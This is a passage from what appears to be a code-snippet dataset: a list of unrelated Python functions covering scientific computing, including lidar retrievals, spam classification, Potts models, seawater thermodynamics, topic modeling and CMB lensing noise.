phi_O2]\n \n # HSRLProfile(T,BSR,phi,rb_spec,Trx,inu0,K,base_T,base_P)\n HSRL_mol = HSRLProfile(xS[:,0],xS[:,2],xS[:,3],rb_spec['HSRL'],Trx['HSRL Mol'],inu0['HSRL'],xK[0],base_T,base_P)+Prof['HSRL Mol BG']\n HSRL_comb = HSRLProfile(xS[:,0],xS[:,2],xS[:,3],rb_spec['HSRL'],Trx['HSRL Comb'],inu0['HSRL'],xK[1],base_T,base_P)+Prof['HSRL Comb BG']\n \n# WVDIALProfile(T,nWV,BSR,phi,rb_spec,abs_spec,Trx,inu0,K,base_T,base_P,dr)\n WV_on = WVDIALProfile(xS[:,0],xS[:,1],xS[:,2]+bsrMult['WV'],xS[:,4],rb_spec['WV Online'],abs_spec['WV Online'],Trx['WV Online'],inu0['WV Online'],xK[2],base_T,base_P,dr,r0)+Prof['WV Online BG']\n WV_off = WVDIALProfile(xS[:,0],xS[:,1],xS[:,2]+bsrMult['WV'],xS[:,4],rb_spec['WV Offline'],abs_spec['WV Offline'],Trx['WV Offline'],inu0['WV Offline'],xK[3],base_T,base_P,dr,r0)+Prof['WV Offline BG']\n\n# O2DIALProfile(T,nWV,BSR,phi,rb_spec,abs_spec,Trx,inu0,K,base_T,base_P,dr)\n O2_on = O2DIALProfile(xS[:,0],xS[:,1],xS[:,2]+bsrMult['O2'],xS[:,5],rb_spec['O2 Online'],abs_spec['O2 Online'],Trx['O2 Online'],inu0['O2 Online'],xK[4],base_T,base_P,dr,r0)+Prof['O2 Online BG']\n O2_off = O2DIALProfile(xS[:,0],xS[:,1],xS[:,2]+bsrMult['O2'],xS[:,5],rb_spec['O2 Offline'],abs_spec['O2 Offline'],Trx['O2 Offline'],inu0['O2 Offline'],xK[5],base_T,base_P,dr,r0)+Prof['O2 Offline BG']\n \n# # Optimization error. T is piecewise\n# OptError = np.nansum(HSRL_mol-(Prof['HSRL Mol'])*np.log(HSRL_mol)) \\\n# +np.nansum(HSRL_comb-(Prof['HSRL Comb'])*np.log(HSRL_comb)) \\\n# +np.nansum(WV_on-(Prof['WV Online'])*np.log(WV_on)) \\\n# +np.nansum(WV_off-(Prof['WV Offline'])*np.log(WV_off)) \\\n# +np.nansum(O2_on-(Prof['O2 Online'])*np.log(O2_on)) \\\n# +np.nansum(O2_off-(Prof['O2 Offline'])*np.log(O2_off)) \\\n# +lam[0]*np.nansum(np.abs(np.diff(xS[:,0]))) \\\n# +lam[1]*np.nansum(np.abs(np.diff(xS[:,1]))) \\\n# +lam[2]*np.nansum(np.abs(np.diff(xS[:,2]))) \\\n# +lam[3]*np.nansum(np.abs(np.diff(xS[:,3]))) \\\n# +lam[4]*np.nansum(np.abs(np.diff(xS[:,4]))) \\\n# +lam[5]*np.nansum(np.abs(np.diff(xS[:,5]))) \n \n # Optimization error. 
T is piecewise slope\n OptError = np.nansum(HSRL_mol-(Prof['HSRL Mol'])*np.log(HSRL_mol)) \\\n +np.nansum(HSRL_comb-(Prof['HSRL Comb'])*np.log(HSRL_comb)) \\\n +np.nansum(WV_on-(Prof['WV Online'])*np.log(WV_on)) \\\n +np.nansum(WV_off-(Prof['WV Offline'])*np.log(WV_off)) \\\n +np.nansum(O2_on-(Prof['O2 Online'])*np.log(O2_on)) \\\n +np.nansum(O2_off-(Prof['O2 Offline'])*np.log(O2_off)) \\\n +lam[0]*np.nansum(np.abs(np.diff(np.diff(xS[:,0])))) \\\n +lam[1]*np.nansum(np.abs(np.diff(xS[:,1]))) \\\n +lam[2]*np.nansum(np.abs(np.diff(xS[:,2]))) \\\n +lam[3]*np.nansum(np.abs(np.diff(xS[:,3]))) \\\n +lam[4]*np.nansum(np.abs(np.diff(xS[:,4]))) \\\n +lam[5]*np.nansum(np.abs(np.diff(xS[:,5])))\n \n return OptError", "def test_create_tpm(self):\n command_line = self._MENU + [self._POOLNAME] + self._DEVICES + [\"--clevis=tpm2\"]\n TEST_RUNNER(command_line)", "def calibration(N,kb,T,Ekinv,V):\n lamb = np.sqrt((N-1)*3*kb*T/(Ekinv*2))\n \n if lamb < 0.9999:\n V = lamb*V\n elif lamb>1.0001:\n V = lamb*V\n \n return V", "def _r_inv(self):\n raise NotImplementedError", "def TR_algo8(self, h):\n ve = 0\n vd = self._vd\n k = 0\n p = [0,]*self._N\n m = max(self._compact_M)\n vM = sum(self._compact_M)\n for i in range(m-1, -1, -1):\n mu = self.extract_mask(i)\n mu_norm = sum([bit_component(mu, j) for j in range(self._N)])\n mu = rotate_right(mu, vd+1)\n pi = rotate_right(ve, vd+1) & (~mu & 2**self._N-1)\n r = [bit_component(h, vM - k - (j+1)) for j in range(mu_norm)][::-1]\n r = sum( [rx*2**j for j, rx in enumerate(r)] )\n k = k + mu_norm\n w = gcr_inv(r, mu, pi)\n l = gc(w)\n l = T_inv(ve, vd, l)\n for j in range(self._N):\n p[j] |= bit_component(l, j) << i\n ve = ve ^ (rotate_left(e(w), vd+1))\n vd = (vd + d(w) + 1) % self._N\n return p", "def __init__(self):\n self.modulo = Bn.from_decimal(\n \"104274339861599109435228713715012587636997755949475388588516377743858594829526246207815488124753620113654378182611410869843692693515483841382145633329409600605358434237971173658402530546783352648106247803514459454270482848535758539851532076708790494943517894654046363923325714750480680188239471613308156143136830981518627799499285672172738874571644891075726999700275877298890101149587792836886648258733566308895110719770960720300899066897289080371563621668124216187770149740826973622700315037066876583866156345639276386510201006397141393775575135928749962477326783336184434815042335057049432193006499521591281357491659\")\n self.generator = FFElement(Bn.from_decimal(\n \"81099144573950922883933823309397903831307729923277144841334749422315595743437219371821139976270089085817737914449263008752457618988770955139245864971428025146021819160336876692205993068777078938240475549226164124952577975303221660397947822711916352061614341728562734417872584743294922245761212731150483802964283263230741041446988298186702952974697967148198190463075071628059974486966250538161512056563568090071474143434146441589514816635339916481756264419884177841781745530245175458079612447970067897693825433138760936325168807521204548329680909932742314536162869895548442852131478295912996232046258690790851591666552\"),\n self.modulo, self.order())", "def test_T2():\n infile = \"cisd/T2.in\"\n assert(os.path.exists(infile))\n with open(infile) as f:\n lines = f.readlines()\n assert(len(lines) == 10)\n\n hl1 = HirataLine(lines[0])\n assert(set(hl1.free_indices.split()) == set(\"p3 p4 h1 h2\".split()))\n assert(hl1.summation_indices == '')\n assert(hl1.prefactors == [\"+ 1.0 \"])\n assert(hl1.postfactors == ['v ( p3 p4 h1 h2 )'])\n assert(str(hl1) == 
lines[0].replace('\\n', ''))\n cl1 = Cc4sLine(hl1)\n assert(set(cl1.free_indices.split()) == set([\"c\", \"d\", \"i\", \"j\"]))\n assert(cl1.summation_indices == \"\")\n assert(cl1.prefactors == [\"+ 1.0 \"])\n assert(cl1.postfactors == ['Vabij[\"cdij\"]'])\n assert(cl1.to_cpp() == ['( + 1.0 ) * Vabij[\"cdij\"];'])\n\n hl8 = HirataLine(lines[7])\n assert(set(hl8.free_indices.split()) == set(\"p3 p4 h1 h2\".split()))\n assert(hl8.summation_indices == ' h6 p5 ')\n assert(\n hl8.prefactors == [\n '+ 1.0 ',\n '- 1.0 * P( p3 p4 h2 h1 => p4 p3 h2 h1 ) ',\n '- 1.0 * P( p3 p4 h2 h1 => p3 p4 h1 h2 ) ',\n '+ 1.0 * P( p3 p4 h2 h1 => p4 p3 h1 h2 ) '\n ]\n )\n assert(\n hl8.postfactors ==\n ['Sum ( h6 p5 )', 't ( p5 p3 h6 h2 )', 'v ( h6 p4 h1 p5 )']\n )\n assert(str(hl8) == lines[7].replace('\\n', ''))\n cl8 = Cc4sLine(hl8)\n assert(set(cl8.free_indices.split()) == set([\"c\", \"d\", \"i\", \"j\"]))\n assert(cl8.summation_indices == \" n e \")\n assert(\n cl8.prefactors ==\n ['+ 1.0 ',\n '- 1.0 * P( c d j i => d c j i ) ',\n '- 1.0 * P( c d j i => c d i j ) ',\n '+ 1.0 * P( c d j i => d c i j ) ']\n )\n assert(cl8.postfactors == ['Tabij[\"ecnj\"]', 'Viajb[\"ndie\"]'])\n assert(\n cl8.to_cpp() == [\n '( + 1.0 ) * Tabij[\"ecnj\"] * Viajb[\"ndie\"];',\n '( - 1.0 ) * Tabij[\"ednj\"] * Viajb[\"ncie\"];',\n '( - 1.0 ) * Tabij[\"ecni\"] * Viajb[\"ndje\"];',\n '( + 1.0 ) * Tabij[\"edni\"] * Viajb[\"ncje\"];'\n ]\n )", "def ev2vi_nrl(eV,mu):\n return 9.79e3/np.sqrt(mu)*np.sqrt(2.*eV)", "def cal_et(self):\r\n\r\n for ind in range(2**(4*self.k)):\r\n i=0\r\n num = int(bin(ind)[2:])\r\n aux = listarNum(num)\r\n list_num=np.array([])\r\n while i < 4*self.k:\r\n if len(aux) < 4*self.k-i:\r\n list_num=np.append(list_num, [0.])\r\n elif len(aux)==4*self.k-i:\r\n list_num=np.append(list_num, aux)\r\n i=i+1\r\n \"\"\"\r\n reversed_list_num = list_num[::-1]\r\n self.et[ind]=reversed_list_num\r\n \"\"\"\r\n self.et[ind]=list_num", "def getEG(n,int_method,func) :\n m = np.asarray([0.5,0.6,0.7,0.8,0.9,1,1.1,1.2,1.3,1.4,1.5,2,2.5,3,3.5,4,\n 4.5,5,5.5,6,6.5,7,7.5,8,8.5,9,9.5,10])\n bes = np.asarray([0.5,0.47768,0.44879,0.39831,0.25858,0,0.15502,0.25699,\n 0.30896,0.35245,0.39119,0.51822,0.53678,0.54984,0.55847,\n 0.56395,0.57054,0.57950,0.58402,0.58765,0.59512,0.60214,\n 0.60469,0.61143,0.61789,0.62443,0.63097,0.63694])\n p = np.asarray([1,0.85417,0.94685,1.04467,2.55052,0,1.59086,\n 1.00670,0.88866,0.83763,0.81030,0.76108,0.83093,0.86863,\n 0.89233,0.90909,0.92097,0.93007,0.93735,0.94332,0.94813,\n 0.95193,0.95557,0.95864,0.96107,0.96360,0.96570,\n 0.96788])\n h0 = np.asarray([0,-0.03567,-0.04808,-0.04315,-0.01879,0,0.00041,0.00069,\n 0.00639,0.01405,0.02294,0.07814,0.13994,0.19278,0.23793,\n 0.27678,0.31039,0.33974,0.36585,0.38917,0.41003,0.42891,\n 0.44621,0.46195,0.47644,0.48982,0.50223,0.51379])\n h1 = np.asarray([0,0.26899, 0.10571,0.01763,-0.39382,0,0.15211,0.05665,\n 0.00933,-0.02791,-0.05876,-0.16720,-0.13033,-0.10455 ,\n -0.08618,-0.07208,-0.06179,-0.05369,-0.04715,-0.04176,\n -0.03742,-0.03408,-0.03081,-0.02808,-0.02599,-0.02375,\n -0.02194,-0.02004])\n h2 = np.asarray([0,-0.09016,-0.06893,-0.04971,-0.08828,0,-0.03341,\n -0.03964,-0.04456,-0.04775,-0.04984,-0.05381,-0.03570,\n -0.02476,-0.01789,-0.01333,-0.01028,-0.00812,-0.00653,\n -0.00534,-0.00444,-0.00376,-0.00319,-0.00274,-0.00238,\n -0.00207,-0.00182,-0.00160])\n h3 = np.asarray([0,0.03993,0.03363,0.02216,-0.00797,0,0.00899,0.01172,\n 0.01150,0.01026,0.00860,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,\n 0])\n \n if (func == True) :\n int_bes = splev(n,splrep(m, bes))\n 
int_p = splev(n,splrep(m, p))\n int_h0 = splev(n,splrep(m, h0))\n int_h1 = splev(n,splrep(m, h1))\n int_h2 = splev(n,splrep(m, h2))\n int_h3 = splev(n,splrep(m, h3))\n else :\n int_bes = griddata(m, bes, n, method=int_method)\n int_p = griddata(m, p, n, method=int_method)\n int_h0 = griddata(m, h0, n, method=int_method)\n int_h1 = griddata(m, h1, n, method=int_method)\n int_h2 = griddata(m, h2, n, method=int_method)\n int_h3 = griddata(m, h3, n, method=int_method)\n \n return np.asarray([int_bes,int_p,int_h0,int_h1,int_h2,int_h3])", "def intf_ENTPGRAM(E):\n # !! Need to check for some eids being TRIs. Filter that out.\n if ( not inc.entid_or_LST_of_entids(E.The,3) or \n not inc.point_formatted_LST(E.The,2) or\n not inc.point_formatted_LST(E.The,1) ):\n print(\"Input Error: pgram\")\n print(intf_ENTPGRAM.__doc__)\n return # Without doing much of anything.\n oB= [ xyz.val for xyz in E.The.StackPop().val ] # A list [3.5 -2 0].\n oA= [ xyz.val for xyz in E.The.StackPop().val ] # A list [3.5 -2 0].\n myeids= E.The.StackPop().val\n if type(myeids)==type(list()):\n #myeids= map(lambda x:x.val, myeids) # Should now be a list of ints.\n myeids= [x.val for x in myeids] # Should now be a list of ints.\n else:\n myeids= [ myeids ] # Also a (1 item) list of ints.\n neweidlist= []\n for myeid in myeids:\n if myeid in MMEL.El: # Check if eid exists.\n src_ent= MMEL.El[myeid]\n new_ent= src_ent.duplicate()\n new_ent.translate([ oB[0]-oA[0], oB[1]-oA[1], oB[2]-oA[2] ])\n As= mm.Entity.allplist.PLdict[ src_ent.epts[0] ]\n Ae= mm.Entity.allplist.PLdict[ src_ent.epts[1] ]\n Bs= mm.Entity.allplist.PLdict[ new_ent.epts[0] ]\n Be= mm.Entity.allplist.PLdict[ new_ent.epts[1] ]\n neweidlist.append(new_ent.eid)\n MMEL.add_ent(new_ent)\n line_entS= mm.Line_Entity( [As,Bs] )\n neweidlist.append(line_entS.eid)\n MMEL.add_ent(line_entS)\n line_entE= mm.Line_Entity( [Ae,Be] )\n neweidlist.append(line_entE.eid)\n MMEL.add_ent(line_entE)\n tri_entA= mm.Tri_Entity( [As, Ae, Bs] )\n neweidlist.append(tri_entA.eid)\n MMEL.add_ent(tri_entA)\n tri_entB= mm.Tri_Entity( [Bs, Be, Ae] )\n neweidlist.append(tri_entB.eid)\n MMEL.add_ent(tri_entB)\n else:\n print(\"WARNING: Entity ID# %d does not exist.\" % myeid)\n if neweidlist:\n neweids= objectifier.StackOB_LST( [objectifier.StackOB_VAL(x) for x in neweidlist] )\n E.The.StackPush(neweids)\n OUT.default(MMEL,E) # AUTODUMP ", "def vinet(p, v):\n x = ( v / p[3] ) ** ( 1.0 / 3 )\n xi = 3.0 / 2 * ( p[2] - 1 )\n return p[0] + 9 * p[1] * p[3] / ( xi**2 ) * ( 1 + ( xi * ( 1 - x ) - 1 ) * np.exp( xi * ( 1 - x ) ) )", "def produce_13TeV_template(tag_name=\"HKHI\"):\n num_rebin = 1\n file_name = \"inputs/BkgEstimation_Lin/BkgEstimation_NONE_TOPO_PTDEP_\"+tag_name+\"_Lin.root\"\n print \"Input: \", file_name\n fin = ROOT.TFile.Open(file_name, \"read\")\n h_nom = fin.Get(\"bkg_total_gg_full\").Clone(\"bkg_nominal_old\")\n h_nom.Rebin(num_rebin)\n fout = ROOT.TFile.Open(\"hists_input_\"+tag_name+\".root\", \"recreate\")\n\n h_purity_sys = fin.Get(\"bkg_purity_syst_gg_full\").Clone(\"bkg_purity_syst_gg\")\n h_reducible_sys = fin.Get(\"bkg_reducible_syst_gg_full\").Clone(\"bkg_reducible_syst_gg\")\n h_irreducible_sys = fin.Get(\"bkg_irreducible_syst_gg_full\").Clone(\"bkg_irreducible_syst_gg\")\n h_iso_sys = fin.Get(\"bkg_iso_syst_gg_full\").Clone(\"bkg_iso_syst_gg\")\n\n #file_iso = \"isolation_sys/hist.root\"\n #fin2 = ROOT.TFile.Open(file_iso, \"read\")\n #h_iso_sys = fin2.Get(\"bkg_isolation_syst_gg\")\n ## inflat irreducible uncertainty by factor of 10\n # so that it closes to stats 
uncertainty in data\n sf = 1\n if INFLATE_SYS:\n sf = 10\n\n # after rebinning systematic uncertainties, need to scale down,\n # otherwise the uncertainties are inflated.\n h_purity_sys.Rebin(num_rebin).Scale(sf/num_rebin)\n h_irreducible_sys.Rebin(num_rebin).Scale(sf/num_rebin)\n h_reducible_sys.Rebin(num_rebin).Scale(sf/num_rebin)\n h_iso_sys.Rebin(num_rebin).Scale(sf/num_rebin)\n\n ## truncate the histograms to [200, 2000] GeV\n h_nom_new = truncate_hist(h_nom, \"bkg_nominal\")\n h_purity_sys_new = truncate_hist(h_purity_sys, \"h_purity_sys_new\")\n h_irreducible_sys_new = truncate_hist(h_irreducible_sys, \"h_irreducible_sys_new\")\n h_reducible_sys_new = truncate_hist(h_reducible_sys, \"h_reducible_sys_new\")\n h_iso_sys_new = truncate_hist(h_iso_sys, \"h_iso_sys_new\")\n\n #write down sys and nominal\n fout.cd()\n h_nom_new.Write()\n h_purity_sys_new.Write()\n h_reducible_sys_new.Write()\n h_irreducible_sys_new.Write()\n h_iso_sys_new.Write()\n\n h_purity_up, h_purity_down = create_sys_hist(h_nom_new, h_purity_sys_new, \"purity_sys\")\n h_purity_up.Write()\n h_purity_down.Write()\n\n h_red_up, h_red_down = create_sys_hist(h_nom_new, h_reducible_sys_new, \"reducible_sys\")\n h_red_up.Write()\n h_red_down.Write()\n\n h_irred_up, h_irred_down = create_sys_hist(h_nom_new, h_irreducible_sys_new, \"irreducible_sys\")\n h_irred_up.Write()\n h_irred_down.Write()\n\n h_iso_up, h_iso_down = create_sys_hist(h_nom_new, h_iso_sys, \"isolation_sys\")\n h_iso_up.Write()\n h_iso_down.Write()\n\n fin.Close()\n fout.Close()", "def testingPhase(SP, HP):\n classification= {}\n TP, TN, FP, FN = 0,0,0,0\n\n pullData = open(\"labels\", \"r\").read()\n dataArray= pullData.split('\\n')\n dataArrayTest=dataArray[21301:-1] #opens files from folder 070 onwards \n \n for eachLine in dataArrayTest:\n kind,file = eachLine.split(' ')\n print(file,kind)\n if (kind == \"spam\"):\n SO = 1 #initially stating that it is a spam not a ham\n HO = 0\n elif (kind== \"ham\"):\n HO = 1\n SO = 0\n file=file.strip('../') \n fileDir = os.path.dirname(os.path.realpath('__file__'))\n filepath = os.path.join(fileDir,file) \n email=\"\"\n fh = open(filepath, encoding=\"ascii\", errors=\"ignore\")\n for line in fh:\n email += line\n fh.close()\n email= email.lower()\n email_words = processText(contentEmail(email))\n email_words = tuple(email_words)\n spam_ba= math.log(PS,10) #initially contains value of Spam Probability\n ham_ba= math.log(PH, 10) #initially contains value of Ham Probability\n\n\n \"\"\"BAYES THEOREM\"\"\"\n for word, value in SP.items(): \n if word in email_words:\n x = math.log(value, 10)\n spam_ba += x\n else:\n x = math.log(1-value, 10)\n #print(x)\n spam_ba += x \n if ham_ba > spam_ba:\n label=\"ham\"\n elif ham_ba < spam_ba:\n label=\"spam\"\n\n for word,value in HP.items(): \n if word in email_words:\n x = math.log(value, 10)\n #print(x)\n ham_ba += x \n else:\n x = math.log(1-value, 10)\n #print(x)\n ham_ba += x \n if ham_ba > spam_ba:\n label=\"ham\"\n elif ham_ba < spam_ba:\n label=\"spam\"\n\n print(\"Spam Prob: \" ,spam_ba, \"Ham Prob: \" ,ham_ba)\n\n #This part determines if the emails are ham or spam depending on the calculations\n if HO == 1 and label == \"ham\":\n TN +=1\n if HO == 1 and label == \"spam\":\n FP +=1\n if SO == 1 and label == \"spam\":\n TP +=1\n if SO == 1 and label == \"ham\":\n FN +=1\n #print(classification)\n print(TP, TN, FP, FN)\n print(spam_ba)\n print(ham_ba)\n \"\"\"COMPUTES PRECISION AND RECALL\"\"\"\n Precision = TP/(TP+FP)\n Recall = TP/(TP+FN)\n\n print(\"Precision: \", 
Precision, \" \", \"Recall: \", Recall)", "def V2E(V):\n# for v in m/s returns energy in meV\n return 5.227e-6*V*V", "def e_step(self):\n # update VMF probabilities (Equation (3))\n logP = np.dot(self.features, self.mu.T)*self.kappa + np.log(self.pi).reshape(1,-1) # n by k\n logP_norm = logP - logsumexp(logP, axis=1).reshape(-1,1)\n self.p = np.exp(logP_norm)\n self.mllk = np.mean(logsumexp(logP, axis=1))", "def prove_I0() -> Proof:\n # Task 4.8", "def prove_NNE() -> Proof:\n # Optional Task 6.7b", "def define_potts_helper_functions(k):\n\n @njit\n def calc_observables(X, k=k):\n \"\"\"\n Parameters\n ----------\n X : ndarray of dtype np.int64\n Dimensions (n_samples, n_spins).\n\n Returns\n -------\n ndarray\n Dimensions (n_samples, n_observables).\n \"\"\"\n\n n = X.shape[1]\n Y = np.zeros((len(X), n*k+n*(n-1)//2), dtype=np.int8)\n \n # average orientation (magnetization)\n # note that fields for the third state are often set to 0\n counter = 0\n for i in range(k):\n for j in range(n):\n Y[:,counter] = X[:,j]==i\n counter += 1\n \n # pairwise correlations\n for i in range(n-1):\n for j in range(i+1, n):\n Y[:,counter] = X[:,i]==X[:,j]\n counter += 1\n \n return Y\n\n def calc_e(X, multipliers, k=k, calc_observables=calc_observables):\n \"\"\"\n Parameters\n ----------\n X : ndarray of dtype np.int64\n Dimensions (n_samples, n_spins).\n multipliers : ndarray of dtype np.float64\n\n Returns\n -------\n ndarray\n Energies of each observable.\n \"\"\"\n\n return -calc_observables(X, k).dot(multipliers)\n\n def mch_approximation(sample, dlamda, calc_e=calc_e):\n \"\"\"Function for making MCH approximation step for Potts model.\n \n Parameters\n ----------\n sample : ndarray\n Of dimensions (n_sample, n_spins).\n dlamda : ndarray\n Change in parameters.\n \n Returns\n -------\n ndarray\n Predicted correlations.\n \"\"\"\n\n dE = calc_e(sample, dlamda)\n ZFraction = len(dE) / np.exp(logsumexp(-dE))\n predsisj = (np.exp(-dE[:,None]) / len(dE) * calc_observables(sample)).sum(0) * ZFraction \n assert not ((predsisj<0).any() or\n (predsisj>(1+1e-10)).any()),\"Predicted values are beyond limits, (%E,%E)\"%(predsisj.min(),\n predsisj.max())\n return predsisj\n\n return calc_e, calc_observables, mch_approximation", "def enthalpy_SSO_0_p(p):\r\n v01 = 9.998420897506056e+2\r\n v05 = -6.698001071123802\r\n v08 = -3.988822378968490e-2\r\n v12 = -2.233269627352527e-2\r\n v15 = -1.806789763745328e-4\r\n v17 = -3.087032500374211e-7\r\n v20 = 1.550932729220080e-10\r\n v21 = 1.0\r\n v26 = -7.521448093615448e-3\r\n v31 = -3.303308871386421e-5\r\n v36 = 5.419326551148740e-6\r\n v37 = -2.742185394906099e-5\r\n v41 = -1.105097577149576e-7\r\n v43 = -1.119011592875110e-10\r\n v47 = -1.200507748551599e-15\r\n SSO = 35.16504\r\n a0 = v21 + SSO * (v26 + v36 * SSO + v31 * np.sqrt(SSO))\r\n a1 = v37 + v41 * SSO\r\n a2 = v43\r\n a3 = v47\r\n b0 = v01 + SSO * (v05 + v08 * np.sqrt(SSO))\r\n b1 = 0.5 * (v12 + v15 * SSO)\r\n b2 = v17 + v20 * SSO\r\n b1sq = b1 ** 2\r\n sqrt_disc = np.sqrt(b1sq - b0 * b2)\r\n N = a0 + (2 * a3 * b0 * b1 / b2 - a2 * b0) / b2\r\n M = a1 + (4 * a3 * b1sq / b2 - a3 * b0 - 2 * a2 * b1) / b2\r\n A = b1 - sqrt_disc\r\n B = b1 + sqrt_disc\r\n part = (N * b2 - M * b1) / (b2 * (B - A))\r\n db2Pascal = 10000.0\r\n return (db2Pascal * (p * (a2 - 2 * a3 * b1 / b2 + 0.5 * a3 * p) / b2 +\r\n (M / (2 * b2)) * np.log(1 + p * (2 * b1 + b2 * p) / b0) + part *\r\n np.log(1 + (b2 * p * (B - A)) / (A * (B + b2 * p)))))", "def Create(self, tokens):\n self.delay1 = int(tokens[DELAY1])\n self.delay2 = 
int(tokens[DELAY2])\n self.block = int(tokens[BLOCK])\n self.trial = int(tokens[TRIAL])\n self.practiced = tokens[PRACTICED]\n self.fixationOnset = int(tokens[FIXATION_ONSET])\n self.encodingOnset = int(tokens[ENCODING_ONSET])\n self.encodingRt = int(tokens[ENCODING_RT])\n self.executionOnset = int(tokens[EXECUTION_ONSET])\n self.executionRt = int(tokens[EXECUTION_RT])\n self.probeOnset = int(tokens[PROBE_ONSET])\n self.probeRt = int(tokens[PROBE_RT])\n self.probeAcc = int(tokens[PROBE_ACC])\n self.acc = int(tokens[PROBE_ACC])\n self.blockBegin = 0\n self.blockOffset = 0\n\n # In case of RTs that are 0s, one needs to apply\n # a correction. In particular, one needs to estimate\n # the correct duration of each phase.\n if self.encodingRt == 0:\n d = self.executionOnset - self.encodingOnset - self.delay1 - 2000\n #print \"Trial %d, EncodingRT=0, estimated as %d\" % (self.trial, d) \n self.encodingRt = d\n\n if self.executionRt == 0:\n d = self.probeOnset - self.executionOnset - self.delay2 - 1000\n #print \"Trial %d, ExecutionRT=0, estimated as %d, probe=%d, exec=%d, delay2=%d\" % (self.trial, d, self.probeOnset, self.executionOnset, self.delay2) \n self.executionRt = d\n\n # If, after the correction, we have negative RTs, that means\n # that we are dealing with aborted trials (in the newer version \n # of the Eprime script). They need to be removed.\n \n if self.executionRt <= 0 or self.encodingRt <= 0:\n print \"*** Excluding trial %d --- out of time ***\" % self.trial\n # The current probe RT belongs to the previous trial, so it must\n # be overwritten.\n self.executionRt = -1 # Override (in case only Encoding was detected)\n self.probeRt = -1 # Override\n self.probeAcc = 0\n self.acc = 0\n\n self.onsets = {'Encoding' : self.encodingOnset,\n 'Execution' : self.executionOnset,\n 'Probe' : self.probeOnset}\n\n self.rts = {'Encoding' : self.encodingRt,\n 'Execution' : self.executionRt,\n 'Probe' : self.probeRt}", "def TCVB0(docs, alpha, beta, epsilon=0.0001, log=no_log):\n D, V = docs.shape\n K = len(alpha)\n\n #store variational q_{z_{d,w} = t} for each d as sparse table in\n #array z\n z = np.zeros(D, dtype=object)\n\n #initialize counts\n #N[t, w] = expectaction of unnormalized phi_{k,w}\n N = np.zeros((V, K), dtype=float)\n\n #Nd[d, t] = unnormalized theta_{d,k}\n Nd = np.zeros((D, K), dtype=float)\n\n for d in xrange(D):\n #random initialization\n init = rand(docs[d].nnz * K)\n active_words = docs[d].nonzero()[1]\n ij = (np.repeat(active_words, K), np.tile(np.arange(K), len(active_words)))\n\n #z[d] is VxK sparse row matrix\n z[d] = csr_matrix((init, ij), shape=(V, K))\n\n #normalize z[d]\n z[d] = normalize(z[d], norm='l1', axis=1)\n\n #update counts\n #set_trace()\n M = diag(docs[d]).dot(z[d]).toarray()\n N += M\n Nd[d] = M.sum(axis=0) + alpha\n\n log('document %d/%d preinitialized' % (d + 1, D))\n\n #sum of array and matrix is matrix, so convertion is required\n N = np.asarray(N) + beta\n\n #Nt[t] is pre-computed unnormalized expectation topic t\n Nt = np.squeeze(np.asarray(N.sum(axis=0)))\n if type(beta) is float:\n Nt += V * beta\n elif type(beta) is np.ndarray:\n Nt += beta.sum(axis=0)\n else:\n raise 'beta must be either scalar (float) number for symmetric prior or a full matrix VxK for custom prior'\n\n #do variational updates until convergence\n iteration = 1\n while True:\n iteration_time = time()\n avg_diff = 0.0\n\n #for each document\n for d in xrange(D):\n #for each word in a document\n max_diff = 0.0\n doc_diff = 0.0\n\n doc_w = docs.data[docs.indptr[d]:docs.indptr[d + 
1]]\n\n i = 0\n old_z_d = z[d].data.copy()\n #for each word in the document d\n #do variational update and estimate difference\n for w in docs.indices[docs.indptr[d]:docs.indptr[d + 1]]:\n #save old q(z_d) distribution\n old_z = z[d].data[z[d].indptr[w]:z[d].indptr[w + 1]] * doc_w[i]\n #we take expectations ignoring current document and current word\n N[w] -= old_z\n Nt[:] -= old_z\n Nd[d] -= old_z\n #update\n new_z = N[w] / Nt * Nd[d]\n #normalization\n new_z /= new_z.sum()\n #write new values back\n z[d].data[z[d].indptr[w]:z[d].indptr[w + 1]] = new_z\n #expectations update\n new_z *= doc_w[i]\n N[w] += new_z\n Nt[:] += new_z\n Nd[d] += new_z \n\n i += 1\n\n #word_diff = variational_update(d, w)\n doc_diff += np.abs(old_z_d - z[d].data)\n avg_diff += doc_diff.sum()\n max_diff = max(max_diff, doc_diff.max())\n if d % 100 == 0:\n log('document %d/%d was updated' % (d + 1, D))\n\n avg_diff /= docs.nnz * K\n log('iteration %d. avg diff: %f. max diff: %f. time: %f' % (iteration, avg_diff, max_diff, time() - iteration_time))\n\n if max_diff < epsilon:\n break\n\n iteration += 1\n\n return z", "def N_TE_EB(self, L):\n if L>2.*min(self.CMB.lMaxT, self.CMB.lMaxP):\n return 0.\n # integrand\n def integrand(x):\n theta = x[1]\n l1 = np.exp(x[0])\n l2 = self.l2(L, l1, theta)\n if l2<self.CMB.lMin or l2>min(self.CMB.lMaxT, self.CMB.lMaxP):\n return 0.\n phi = self.phi(L, l1, theta)\n result = 0. #self.F_EB(l1, l2, phi)*self.CMB.ftotalTE(l1)*self.CMB.ftotalEB(l2)\n result += 0. #self.F_EB(l2, l1, -phi)*self.CMB.ftotalTB(l1)*self.CMB.ftotalEE(l2)\n result *= self.F_TE(l1, l2, phi)\n result *= l1**2\n result /= (2.*np.pi)**2\n result *= 2.\n return result\n \n # if first time, initialize integrator\n if not hasattr(self.N_TE_EB.__func__, \"integ\"):\n self.N_TE_EB.__func__.integ = vegas.Integrator([[np.log(self.CMB.lMin), np.log(min(self.CMB.lMaxT, self.CMB.lMaxP))], [0., np.pi]])\n self.N_TE_EB.integ(integrand, nitn=8, neval=1000)\n result = self.N_TE_EB.integ(integrand, nitn=1, neval=5000)\n return result.mean", "def N_TT_TE(self, L):\n if L>2.*min(self.CMB.lMaxT, self.CMB.lMaxP):\n return 0.\n # integrand\n def integrand(x):\n theta = x[1]\n l1 = np.exp(x[0])\n l2 = self.l2(L, l1, theta)\n if l2<self.CMB.lMin or l2>min(self.CMB.lMaxT, self.CMB.lMaxP):\n return 0.\n phi = self.phi(L, l1, theta)\n result = self.F_TE(l1, l2, phi)*self.CMB.ftotalTT(l1)*self.CMB.ftotalTE(l2)\n result += self.F_TE(l2, l1, -phi)*self.CMB.ftotalTE(l1)*self.CMB.ftotalTT(l2)\n result *= self.F_TT(l1, l2, phi)\n result *= l1**2\n result /= (2.*np.pi)**2\n result *= 2.\n return result\n\n # if first time, initialize integrator\n if not hasattr(self.N_TT_TE.__func__, \"integ\"):\n self.N_TT_TE.__func__.integ = vegas.Integrator([[np.log(self.CMB.lMin), np.log(min(self.CMB.lMaxT, self.CMB.lMaxP))], [0., np.pi]])\n self.N_TT_TE.integ(integrand, nitn=8, 